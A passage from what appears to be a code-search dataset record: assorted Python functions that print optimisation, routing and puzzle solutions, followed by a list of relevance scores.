%d\"%(result_status))\n\n\t\ttext.insert(END, \n\t\t\t\t\"\\nNumber of variables = %d\\n\"%(model.NumVariables()))\n\n\t\tprint (\"Number of variables = %d\"%(model.NumVariables()))\n\t\tprint (\"Number of constraints = %d\"%(model.NumConstraints()))\n\n\t\ttext.insert(END, \"\\nNumber of constraints = 
%d\\n\"%(model.NumConstraints()))\n\t\t\n\n\t\ttext.insert(END, \"\\nProblem solved in %f ms \\n\"%(model.wall_time()))\n\n\t\tprint (\"\\nProblem solved in %f milliseconds \\n\" %(model.wall_time()))\n\n\t\ttext.insert(END, \"\\nOptimal objective value = %f \\n\" %(model.Objective().Value())) #The objective value of the solution `no reduced costs`\n\t\tprint (\"\\nOptimal objective value = %f\\n\" %(model.Objective().Value()))\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n%s = %f\\n\"%(variable.name(), variable.solution_value()))\n\t\t\tprint (\"%s = %f\" %(variable.name(), variable.solution_value()))\n\n\t\ttext.insert(END, \"\\n \\nAdvanced Stats: \\n\")\n\t\tprint (\"\\n \\nAdvanced Stats: \\n\")\n\t\ttext.insert(END, \"\\n \\nProblem Solved in %d iterations\"%model.iterations())\n\t\tprint (\"\\n \\n Problem solved in %d iterations\" %model.iterations())\n\n\t\tfor variable in decisions:\n\t\t\ttext.insert(END, \"\\n \\n%s: reduced cost = %f\" %(variable.name(), \n\t\t\t\t\t\t\t\t\tvariable.reduced_cost()))\n\t\t\tprint (\"%s: reduced cost = %f\" %(variable.name(), variable.reduced_cost()))\n\n\t\tactivities = model.ComputeConstraintActivities() #printout of RHS = `b` in AX = b\n\n\t\tfor i, constraint in enumerate(constraints):\n\t\t\ttext.insert(END, \n\t\t\t\t\"\\n\\nconstraint %s: \\ndual value = %f\\n activity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(), \n\t\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\n\t\t\tprint (\"constraint %s: dual value = %f\\nactivity=%f\" %(constraint.name(), \n\t\t\t\t\t\t\t\t\t\tconstraint.dual_value(),\n\t\t\t\t\t\t\t\t\t\tactivities[constraint.index()]))\n\t\t\ttext.insert(END, \n\t\t\t\t\t\"\\nLower to Upper Boundary:\\n \\t %f < %.2d < %f\" %(constraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t\t activities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t\t constraint.Ub()))\n\n\t\t\tprint (\"\\nLower.....to.....Upper Boundary:\\n\\t %f < %.2d < %f\" %(constraint.Lb(),\n\t\t\t\t\t\t\t\t\t\t activities[constraint.index()],\n\t\t\t\t\t\t\t\t\t\t constraint.Ub()))\n\n\t\t\tprint(\"\\nSLACK/SURPLUS status:\\n\\t %s\"%(constraint.basis_status()))\n\n\t\t\ttext.insert(END,\n\t\t\t\t\t\"\\nSLACK/SURPLUS status:\\n\\t %s\"%(constraint.basis_status()))\n\t\ttext.config(state=DISABLED)\n\t\ttext.pack()\n\t\tself.root.config(menu=menubar)", "def test_print_end(self):\n response = support.create_project(self, 'madison')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n print_string = string.ascii_lowercase\n\n code = '\\n'.join([\n 'import cauldron as cd',\n 'cd.display.text(\"Hello World\")',\n 'print(\"{}\")'.format(print_string)\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(print_string),\n 2,\n 'should have printed ascii lowercase'\n )", "def solution(p, id_):\n out = list()\n run_prog(read_input(), [id_], out)\n print(f\"Solution to part {p}: {out[-1]}\")", "def main():\n\n args = get_args()\n words = args.phrase\n\n words = codify_phrase(words)\n display = ' '.join(words)\n\n print(display)", "def text_output(self):\n print(self.board)\n print()", "def display_results(start, came_from, goal, time, visited_nodes):\n if time == 0:\n print \"No solution found!\"\n solution = 
reconstruct_path(came_from, start, goal)\n visualize(solution)\n print 'Solution steps: {0}'.format(', '.join(solution_steps(solution))) + '.'\n print 'Time to find solution of the board: {0}'.format(time) + '.'\n print 'Visited nodes: {0}'.format(visited_nodes) + '.'", "def main():\n num_of_tests = int(input())\n\n # iterate over test cases\n for test_case in range(1, num_of_tests + 1):\n result = handle_case()\n printable_result = handle_result(result)\n print(\"Case #{}: {}\".format(test_case, printable_result))", "def completion(state: bool) -> None:\r\n if state:\r\n print(\"Solution is reached. Zero represents marked nodes\")\r\n print_debug(\"checkstate\")\r\n print(\"Preferred output:\")\r\n for y in range(shape):\r\n for x in range(shape):\r\n if example[y, x] == 0:\r\n print(\"X\", end='')\r\n else:\r\n print(example[y, x], end='')\r\n else:\r\n print(\"I'm a big dumb dumb and this is where I am stuck.\")\r\n print(example)\r\n print(\"Conflict Board state:\")\r\n print(conflict_space)\r\n print(\"safeboard state:\")\r\n print(safeboard)\r\n exit()", "def main():\n print \"Printing Sample Status\"", "def show_completed_design(completed_design):\n print(\"\\nThe following models have been printed:\")\n for completed_designs in completed_design:\n print(completed_designs)", "def main():\n logger = logging.getLogger()\n x1 = 2\n y1 = 3\n logger.info('Realizando suma')\n logger.debug('{x} + {y} = '.format(x=x1, y=y1) + str(add(x1, y1)))\n logger.info('Realizando resta')\n logger.debug('{x} - {y} = '.format(x=x1, y=y1) + str(subtract(x1, y1)))\n logger.info('Realizando multiplicación')\n logger.debug('{x} * {y} = '.format(x=x1, y=y1) + str(multiply(x1, y1)))\n logger.info('Realizando división')\n logger.debug('{x} / {y} = '.format(x=x1, y=y1) + str(divide(x1, y1)))\n logger.debug('TERMINADO')\n logger.critical('FAIL')", "def print_solution(data, manager, routing, solution):\r\n time_dimension = routing.GetDimensionOrDie('Time')\r\n total_distance = 0\r\n total_load = 0\r\n total_time = 0\r\n for vehicle_id in range(data['num_vehicles']):\r\n index = routing.Start(vehicle_id)\r\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\r\n route_distance = 0\r\n route_load = 0\r\n while not routing.IsEnd(index):\r\n node_index = manager.IndexToNode(index)\r\n route_load = route_load + data['demands'][node_index]\r\n time_var = time_dimension.CumulVar(index)\r\n plan_output += ' {0} Load({1}) Time({2},{3}) -> '.format(node_index, route_load,\r\n solution.Min(time_var), solution.Max(time_var))\r\n previous_index = index\r\n index = solution.Value(routing.NextVar(index))\r\n route_distance += routing.GetArcCostForVehicle(previous_index, index, vehicle_id)\r\n time_var = time_dimension.CumulVar(index)\r\n plan_output += ' {0} Load({1}) Time({2},{3})\\n'.format(manager.IndexToNode(index), route_load,\r\n solution.Min(time_var), solution.Max(time_var))\r\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\r\n plan_output += 'Load of the route: {}\\n'.format(route_load)\r\n plan_output += 'Time of the route: {}min\\n'.format(solution.Min(time_var))\r\n print(plan_output)\r\n total_distance += route_distance\r\n total_load += route_load\r\n total_time += solution.Min(time_var)\r\n print('Total distance of all routes: {}m'.format(total_distance))\r\n print('Total load of all routes: {}'.format(total_load))\r\n print('Total time of all routes: {}min'.format(total_time))", "def print(self):\n if self.passed():\n self.print_passed()\n else:\n self.print_failed()", "def 
_doParseSolution(self, st, stdout):\n raise Exception(\"Not implemented\")", "def demo():\n\n # Initialize board with all cells having possible values 1..9\n board = board_init()\n\n # Unsolved demo puzzle\n # Hard puzzle by Arto Inkala:\n # http://abcnews.go.com/blogs/headlines/2012/06/can-you-solve-the-hardest-ever-sudoku/\n read_puzzle(board, \"8..........36......7..9.2...5...7.......457.....1...3...1....68..85...1..9....4..\")\n\n # Print unsolved puzzle\n print(\"Initial Sudoku board:\")\n print_board(board)\n\n # Solve the puzzle\n board = solve_puzzle(board)\n\n # Print the solution\n print(\"Solution:\")\n print_board(board)\n\n\n # Write output to file\n write_to_file(board)\n \n return 0", "def print_summary(self):\n #exec(\"print(storyline.{}_clause+', '+storyline.{}_clause.lower()+', '+storyline.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n #exec(\"print(self.{}_clause+', '+self.{}_clause.lower()+', '+self.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n lwr = \".lower()\"\n exec(\"print(\"+str(3*(\"self.{}_clause{}+',', \")).format(\"A\",\"\",\"B\",lwr,\"C\",lwr)+\"'\\b\\b')\")", "def main():\n test_problem3()", "def print_solutions(file_):\n with open(file_, 'r') as inp:\n for line in inp:\n print(line[:-5] + str(process_line(line)))", "def preview(problem):\n # Declare problemText first instead of echoing it right away in case the\n # problem does not exist in problems.txt; strip newline from end of text\n problemText = get_problem(problem)[:-1]\n click.secho(\"Project Euler Problem %i\" % problem, bold=True)\n click.echo(problemText)", "def print_output(tree):\n print_value(tree)\n print_tree(tree)", "def print_result(best_instance):\n\n print('Best instance: ')\n print('Generation: ' + str(best_instance.generation))\n print('Instance: ' + str(best_instance.instance))\n print('Fitness: ' + str(round(best_instance.value, 2)))\n print('Phenotype: ' + str(best_instance.phenotype))", "def print_string(self):\n for x in self.minimal:\n print(\"min: %s\" % x)\n for x in self.also_installed:\n print(\"als: %s\" % x)\n for x in self.uninstalled:\n print(\"uni: %s\" % x)", "def OnSolutionCallback(self):\n self.total_plans += 1\n print('Feasible Project Plan #{c}:'.format(c=self.total_plans))\n for idx in range(0, len(self.p_)):\n if self.Value(self.p_vars_[idx]):\n print(' - Project ID: {p} (Cost={c}, Value={v})'.format(\n p=(idx + 1), c=self.p_[idx][4], v=self.p_[idx][3]))\n print(' - Total Cost : {c}'.format(c=self.Value(self.total_cost_)))\n print(' - Total Value : {v}'.format(v=self.Value(self.total_value_)))", "def print_sample(arg_pair: EviPair):\n print('Please think about which argument you '\n 'would prefer in a discussion about: '\n '\\'{}\\' '.format(arg_pair.topic))\n print('First evidence has stance {} : '.format(arg_pair.first_stance))\n print(arg_pair.first_evi)\n print('Second evidence has stance {} : '.format(arg_pair.second_stance))\n print(arg_pair.second_evi)\n print('Enter your choice: ')\n nn_prediction = predict_and_eval(arg_pair)\n print('Neuronal Network selected evidence {}'.format(nn_prediction))\n print('By an acceptance rate of {} sample was labeled as {} \\n'.\n format(arg_pair.acceptance_rate, arg_pair.label))", "def print_examples(self):\n print((\"Examples are not defined for command \" + self.command))", "def main():\n print(\"Everything is ok.\")", "def main():\n\tparser = setup_argument_parser()\n\targuments = parser.parse_args()\n\tto_print = arguments.to_print\n\techo(to_print)", "def debug():\r\n global CurrentState\r\n global 
CurrentInput\r\n global RESPONSEOPTIONS\r\n print(\"___________________________\")\r\n for state in RESPONSEOPTIONS:\r\n score = calcTotalScore(state, CurrentInput, CurrentState)\r\n print(state.id + \": \" + str(score) + \" ,\", end=\"\")\r\n print(\"\\n___________________________\")", "def test_print_multiple(self):\n response = support.create_project(self, 'omaha')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n code = '\\n'.join([\n 'import cauldron as cd',\n 'import string',\n 'print(string.ascii_lowercase)',\n 'cd.display.text(\"Hello World\")',\n 'print(string.ascii_uppercase)',\n 'print(string.hexdigits)'\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(string.ascii_lowercase),\n 1,\n 'should have printed ascii lowercase'\n )\n\n self.assertEqual(\n dom.count(string.ascii_uppercase),\n 1,\n 'should have printed ascii uppercase'\n )\n\n self.assertEqual(\n dom.count(string.hexdigits),\n 1,\n 'should have printed hex digits'\n )", "def textuel_auto():\r\n print()\r\n grids = FileManager.read_sudoku(args.file)\r\n for grid in grids:\r\n print(\"Calcul...\")\r\n print(solver.solve(grid))\r\n print(\"Terminé !\")", "def to_print_out(self):\n self.error_throw('output')\n\n if self.rank_method == methods_of_ranking[3]: #'diversified_ranking'\n self.output_div('print')\n else:\n self.output('print')", "def present_solved_equation(self, result):\n print(\"the result to the equation is:\", result)", "def visualize(solution):\n # Check operating system and give the right clear command\n if os.name == 'nt':\n clear = 'cls'\n else:\n clear = 'clear'\n\n os.system(clear)\n # Loops through the list of Grid objects\n for i in range (len(solution[0]) - 1):\n # prints the solution, waits and than clears the displayed solution\n print (solution[0][i])\n time.sleep(.2)\n os.system(clear)\n\n # prints the final grid\n print solution[0][i + 1]\n return", "def print_sudoku_solution(solution):\n for row in range(9):\n for col in range(9):\n print solution['%d-%d' % (row, col)][0],\n if col == 2 or col == 5:\n print '|',\n print\n if row == 2 or row == 5:\n print '------+-------+------'", "def prompt():\n program_info = ('Dice Rolling Simulator\\n'\n 'Author: Franklin Pinnock\\n'\n 'Language: Python 3.4\\n'\n 'Version: 1.0\\n')\n print(program_info)", "def print_eqn():\n if sys.stdout.encoding.lower().startswith('utf'):\n if JS != 0 and JF != 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')\\n +' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) +\n ')-' + str(np.around(JF, decimals=6)) + '*sin(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF != 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) + '*[' + \n '-' + str(np.around(JF, decimals=6)) + '*sin(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS != 0 and JF == 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + 
str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF == 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) + ')')\n else:\n if JS != 0 and JF != 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')\\n +' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6PI/' +\n str(np.around(LAMBDA, decimals=6)) +\n ')-' + str(np.around(JF, decimals=6)) + '*sin(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF != 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) + '*[' + \n '-' + str(np.around(JF, decimals=6)) + '*sin(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS != 0 and JF == 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF == 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) + ')')", "def print_answer(answer):\n print(\"-\" * 40)\n print(u\"Answer: \" + answer)\n print(\"-\" * 40)", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def printInfo():\n print('\\t' * 6 + 'Combinational Circuit Paths')\n\n print('-' * 75)\n\n print('Input: Verilog file with Gate Level Modelling')\n print('Output: All paths from input to output of the circuit described by the Verilog file')\n print('(Optional: Graph of the circuit can also be exported)')\n\n print('-' * 75, end='\\n\\n')", "def display_sol(sol, node_list, v_src_list):\n\n print(\"\\n\")\n node_list = node_list[1:]\n for i in range(len(node_list)):\n print(\"V_\" + node_list[i] + \": \", ffs(np.real(sol[i]), precision=5), '+', ffs(np.imag(sol[i]), precision=5)+'j')\n\n for i in range(len(v_src_list)):\n v = v_src_list[i]\n print(\"I_\" + v.name + \": \", ffs(np.real(sol[len(node_list)+i]), precision=5), '+', ffs(np.imag(sol[len(node_list)+i]), precision=5)+'j')\n print(\"\\n\")", "def print_solution(data, manager, routing, assignment):\r\n total_distance = 0\r\n total_load = 0\r\n for vehicle_id in range(data['num_vehicles']):\r\n index = routing.Start(vehicle_id)\r\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id+1)\r\n route_distance = 0\r\n route_load = 0\r\n while not routing.IsEnd(index):\r\n node_index = manager.IndexToNode(index)\r\n route_load += data['demands'][node_index]\r\n plan_output += ' {0} Load({1}) -> '.format(node_index, route_load)\r\n previous_index = index\r\n index = assignment.Value(routing.NextVar(index))\r\n route_distance += routing.GetArcCostForVehicle(\r\n previous_index, index, vehicle_id)\r\n plan_output += ' {0} Load({1})\\n'.format(manager.IndexToNode(index),\r\n route_load)\r\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\r\n plan_output += 'Load of the route: {}\\n'.format(route_load)\r\n print(plan_output)\r\n total_distance += route_distance\r\n total_load += route_load\r\n print('Total distance of all routes: 
{}m'.format(total_distance))\r\n print('Total load of all routes: {}'.format(total_load))" ]
[ "0.87028384", "0.74389744", "0.7377259", "0.708527", "0.7000077", "0.69975126", "0.69795585", "0.6975123", "0.6821493", "0.6821493", "0.6821493", "0.6735901", "0.6602481", "0.65324736", "0.65144485", "0.64514583", "0.64233005", "0.64180934", "0.63984954", "0.6382045", "0.63810366", "0.63747376", "0.63657063", "0.6355313", "0.63523686", "0.63432306", "0.63385713", "0.6320839", "0.6317033", "0.6307986", "0.62988347", "0.6258159", "0.62496424", "0.622919", "0.6209604", "0.62061924", "0.61834973", "0.61750245", "0.6169629", "0.61598605", "0.61432344", "0.61327976", "0.61011255", "0.60697436", "0.60292894", "0.6017365", "0.5993325", "0.59843487", "0.59632885", "0.5959098", "0.59304446", "0.5923987", "0.5916208", "0.5908206", "0.5904342", "0.58973473", "0.589689", "0.589034", "0.5890035", "0.58784884", "0.58726645", "0.5837811", "0.58338034", "0.58322775", "0.5827711", "0.5827091", "0.5825254", "0.5824642", "0.5821064", "0.58191955", "0.5816615", "0.58127373", "0.58062494", "0.5800548", "0.57777345", "0.5773076", "0.5770662", "0.57542014", "0.57541573", "0.5753299", "0.57495546", "0.5749017", "0.5747906", "0.5739722", "0.57252926", "0.57242846", "0.57207495", "0.5714662", "0.5710271", "0.57075006", "0.57051307", "0.56938803", "0.5690099", "0.56900334", "0.5684113", "0.56819105", "0.56731457", "0.56726223", "0.56698406", "0.565995" ]
0.5708058
89
Returns the travel time between the two nodes.
def time_callback(from_index, to_index):
    # Convert from routing variable Index to time matrix NodeIndex.
    from_node = manager.IndexToNode(from_index)
    to_node = manager.IndexToNode(to_index)
    return self.data['time_matrix'][from_node][to_node]
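For context, a minimal sketch of how a transit callback like this is typically wired into OR-Tools routing. The 3x3 time matrix, single vehicle, and depot index 0 below are illustrative assumptions, not values taken from this record:

from ortools.constraint_solver import pywrapcp, routing_enums_pb2

# Illustrative 3-node time matrix (assumption, not from the record above).
time_matrix = [
    [0, 7, 3],
    [7, 0, 4],
    [3, 4, 0],
]
manager = pywrapcp.RoutingIndexManager(len(time_matrix), 1, 0)  # nodes, vehicles, depot
routing = pywrapcp.RoutingModel(manager)

def time_callback(from_index, to_index):
    # Routing works on internal indices; map them back to matrix node indices.
    from_node = manager.IndexToNode(from_index)
    to_node = manager.IndexToNode(to_index)
    return time_matrix[from_node][to_node]

transit_index = routing.RegisterTransitCallback(time_callback)
routing.SetArcCostEvaluatorOfAllVehicles(transit_index)

params = pywrapcp.DefaultRoutingSearchParameters()
params.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC
solution = routing.SolveWithParameters(params)
if solution:
    print('Total time:', solution.ObjectiveValue())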
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nodes_time(self):\n return self._nodes_time", "def _node_distance(self, first, second):\r\n\r\n name_1 = first.name.split(' ')[0]\r\n name_2 = second.name.split(' ')[0]\r\n\r\n seq1 = self.msa_by_name[name_1]\r\n seq2 = self.msa_by_name[name_2]\r\n\r\n distance = self._seq_distance(seq1, seq2)\r\n\r\n return distance", "def ComputeLightTravelTime(Det1Pos, Det2Pos):\n\n # Get relative position vector\n Det21Pos = Det2Pos - Det1Pos\n \n # Dot difference vector into itself to get magnitude of detector separation\n dist = np.sqrt(np.dot(Det21Pos,Det21Pos))\n\n # Normalise with speed of light\n travelTime = dist/c\n\n return travelTime", "def get_time_walking(self):\n return self.time_step_to_enqueue - self.time_entered", "def get_propagation_time(self):\n return 0.0 # self.get_distance_to_gateway() / (3 * pow(10,8))", "def node_distance(self, node1, node2):\n if node1 == node2:\n return 0.0\n for i, (n1, n2) in enumerate(zip(self.paths[node1], self.paths[node2])):\n if n1 != n2:\n break\n else:\n i = min(len(self.paths[node1]), len(self.paths[node2]))\n return sum(self.path_dists[node1][i:]) + sum(self.path_dists[node2][i:])", "def get_traveltime(self, edge):\n\n return self.graph[edge[0]][edge[1]][\"traveltime\"]", "def compute_travel_time(start_id, dest_id, csv, G):\n \n # route is not computed yet\n if csv[start_id][dest_id] is None:\n return -1\n\n travel_time = 0\n cur_node_id = start_id\n\n while cur_node_id != dest_id:\n \n # get the next node on this route\n next_node_id = csv[cur_node_id][dest_id]\n\n # update the travel time\n edge = G.get_edge_data(cur_node_id, next_node_id)\n travel_time += edge[0]['travel_time']\n\n cur_node_id = next_node_id\n\n return travel_time", "def duration(self):\r\n return self.t2 - self.t1", "def path_time(self, path):\n\n time = 0\n for edge in path:\n time += self.graph[edge[0]][edge[1]][\"traveltime\"]\n\n return time", "def dist(self, node_0, node_1):\n coord_0, coord_1 = self.coords[node_0], self.coords[node_1]\n return math.sqrt((coord_0[0] - coord_1[0]) ** 2 + (coord_0[1] - coord_1[1]) ** 2)", "def service_time(self):\r\n #print self.node_monitor_address, self.completion_time - self.node_monitor_launch_time\r\n return (self.completion_time - self.node_monitor_launch_time)", "def travel_time(self, origin, destination):\n assert 2 <= len(origin) <= 3, \"Origin should by (x, y) or (x, y, z)\"\n assert 2 <= len(destination) <= 3, \"Origin should by (x, y) or (x, y, z)\"\n assert len(origin) == len(destination), \"Elevation should be present in origin and destination or absent in both\"\n if len(origin) == 2:\n xo, yo = origin\n xd, yd = destination\n zo = zd = 0\n else:\n assert len(origin) == 3\n xo, yo, zo = origin\n xd, yd, zd = destination\n\n ground_distance = np.sqrt((xd-xo)**2 + (yd-yo)**2)\n elevation_diff = zd - zo\n if elevation_diff >= 0:\n return max(ground_distance / self.max_airspeed, elevation_diff / self.max_rate_of_climb)\n else:\n return max(ground_distance / self.max_airspeed, -elevation_diff / self.max_rate_of_descent)", "def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)", "def round_trip_time(self):\r\n return self.completion_time - self.launch_time", "def ref_time(self) -> float:\n return ntp_to_system_time(self.ref_timestamp)", "def arrival_time(self):\r\n return self.__arrival_time", "def arrival_time(self):\r\n return self.__arrival_time", "def time_for_travel(self):\n return great_circle(self.pickupcoords, self.dropoffcoords).miles * 3600 / 25", "def dest_time(self) -> float:\n return 
ntp_to_system_time(self.dest_timestamp)", "def get_elapsed_time(self):\n if hasattr(self, 'starttime'):\n return monotonic() - self.starttime\n else:\n return 0", "def calculate_travel_time_simple(distance_meters, accel_mps2):\n time = math.sqrt(4 * distance_meters / accel_mps2)\n speed = accel_mps2 * time * 0.5\n return [time, speed]", "def time_left(self):\n t=self.transport\n return (t.stoptime or t.get_length())-t.get_time()", "def virtual_time(self):\n return (_time.time() - PROTOCOL_START_TIME) / ROUND_DURATION", "def getTokenDistance(self, node1, node2):\n txt = self.getText()\n if node1 < node2:\n start = node1.getSpan()[1]+1\n end = node2.getSpan()[0]\n direction = 1\n else:\n start = node2.getSpan()[1]+1\n end = node1.getSpan()[0]\n direction = -1\n\n sub_txt = txt[start:end]\n tokens = sub_txt.split()\n return len(tokens)*direction", "def set_destination(self):\n # TODO: consider new implementation with multiple paths possible.\n self.destination = self.network[self.current_node]['next']\n lead_time = self.network[self.current_node]['path'].lead_time\n return datetime.timedelta(hours=lead_time)", "def elapsed_time(self) -> float:\n current_time = datetime.utcnow()\n start = self.start_time or current_time\n end = self.end_time or current_time\n return (end - start).total_seconds()", "def _arrival_time(self):\n \n return self.mkt_time + timedelta(0, 0, self.latency)", "def service_time(self):\r\n return (self.completion_time - self.node_monitor_launch_time)", "def getTime(self) -> float:\n return self.t", "def compute_start_and_finish_times(a, n_t, current_time):\n duration = n_t.getc()\n speed = a.getv()\n current_location = a.getz()\n task_loc = n_t.getloc()\n dist = np.sqrt((task_loc[0] - current_location[0]) ** 2 + (task_loc[1] - current_location[1]) ** 2)\n travel_time = dist / speed\n start_time = current_time + travel_time\n finish_time = start_time + duration\n return start_time, finish_time", "def recv_time(self) -> float:\n return ntp_to_system_time(self.recv_timestamp)", "def get_time_diff(start_time_ms: int) -> float:\n end_time_ms = RemoteProvisionerBase.get_current_time()\n time_diff = float((end_time_ms - start_time_ms)/1000)\n return time_diff", "def time_difference(time1: Time, time2: Time) -> float:\n dsec = time1.sec - time2.sec\n dnanosec = time1.nanosec - time2.nanosec\n dt = dsec + dnanosec/(10**9)\n return dt", "def time():\n master = MasterTimer.getMasterTimer()\n\n if master.end_time:\n return master.end_time - master.start_time\n else:\n return time.time() - master.start_time", "def get_time(self) -> float:\n raise NotImplementedError()", "def get_duration(self, current_time):\n return current_time - self.slam.get_data(node_name=self.last_point_name)['time']", "def get_time(self) -> float:\n self.rocket.update()\n return self.rocket.time", "def time(self):\n return _cantera.reactornet_time(self.__reactornet_id)", "def get_speed_cost(data, start_node_id, end_node_id):\n start_node = data[start_node_id]\n dist_cost = get_dist_cost(data, start_node_id, end_node_id)\n # Get the speed limit along the way that connects the starting and ending nodes\n speed_limit_between_nodes = start_node['adjacent'][end_node_id]\n return dist_cost / speed_limit_between_nodes # Cost = Time = Distance/Rate", "def time(self):\n return self._clock() - self._starttime", "def tx_time(self) -> float:\n return ntp_to_system_time(self.tx_timestamp)", "def distance_between(self, first_node_object, second_node_object):\n\n (first_column, first_row) = first_node_object\n (second_column, 
second_row) = second_node_object\n\n return numpy.sqrt((first_row - second_row) ** 2 +\n (first_column - second_column) ** 2)", "def calculate_manhattan(node_a, node_b):\n return (abs(node_a.x - node_b.x) + abs(node_a.y - node_b.y))", "def time(self) -> float:\n return self.sim_scene.data.time", "def get_time(self):\n return self._total_time", "def response_time(self):\r\n if self.__arrival_time == INVALID_TIME:\r\n self.__logger.debug(\"Request %s missing arrival time\" % self.__id)\r\n return INVALID_TIME_DELTA\r\n completion_time = self.__arrival_time\r\n for task_id, task in self.__tasks.items():\r\n if task.completion_time == INVALID_TIME:\r\n self.__logger.debug((\"Task %s in request %s missing completion \"\r\n \"time\") % (task_id, self.__id))\r\n return INVALID_TIME_DELTA\r\n task_completion_time = task.adjusted_completion_time()\r\n #if task.scheduler_launch_time > task.node_monitor_launch_time:\r\n #self.__logger.warn((\"Task %s suggests clock skew: scheduler launch time %d, node \"\r\n # \"monitor launch time %d\") %\r\n\r\n #(task_id, task.scheduler_launch_time,\r\n # task.node_monitor_launch_time))\r\n completion_time = max(completion_time, task_completion_time)\r\n return completion_time - self.__arrival_time", "def to(addr1, addr2):\n directions_result = gmaps.directions(addr1,\n addr2,\n mode=\"transit\",\n alternatives=True)\n\n best,besti = mini(map(calc_time, directions_result), key=lambda x: x[0])\n return best", "def distanceTwoPoints(self,A,B):\n #productive\n # used by addNeedleToScene\n profprint()\n length = ( (A[0]-B[0])**2 + (A[1]-B[1])**2 + (A[2]-B[2])**2 ) ** 0.5\n return length", "def calculate_heuristic(node1, node2):\n return abs(node1.x - node2.x) + abs(node1.y - node2.y)", "def allocation_state_transition_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"allocation_state_transition_time\")", "def distance(self, first, second):\r\n if not((0 <= first < self.size) and (0 <= second < self.size)):\r\n raise ValueError(\"Cannot find distances for nodes not in the graph\")\r\n if first == second:\r\n return 0\r\n dist_tracker = self._perform_dijkstra(first, second)\r\n return dist_tracker.get_min_distance(second)", "def distanceBetween(nodeOneName, nodeTwoName, nodeDatabase):\n\n\tnodeOnePair = getCoords(nodeOneName, nodeDatabase)\n\tnodeTwoPair = getCoords(nodeTwoName, nodeDatabase)\n\n\tif (nodeOnePair == None) or (nodeTwoPair == None):\n\t\traise NameError, \"Unknown node requested, either %s or %s.\" % (nodeOneName, nodeTwoName)\n\n\t(x1, y1) = nodeOnePair\n\t(x2, y2) = nodeTwoPair\n\n\txPair = pow(x1 - x2, 2)\n\tyPair = pow(y1 - y2, 2)\n\n\tdist = sqrt(xPair + yPair)\n\n\treturn dist", "def time_diff(dt1, dt2):\n return abs(int((dt2 - dt1).total_seconds()))", "def get_distance_between_nodes(G, path, subpath1, subpath2):\r\n if subpath1 + subpath2 == path:\r\n node1 = str(subpath1[-1])\r\n node2 = str(subpath2[0])\r\n elif subpath2 + subpath1 == path:\r\n node1 = str(subpath2[-1])\r\n node2 = str(subpath1[0])\r\n else:\r\n raise ValueError(\"Subpath1 and subpath2 passed do not form path\")\r\n return G[node1][node2]['distance']", "def calc_distance(first: 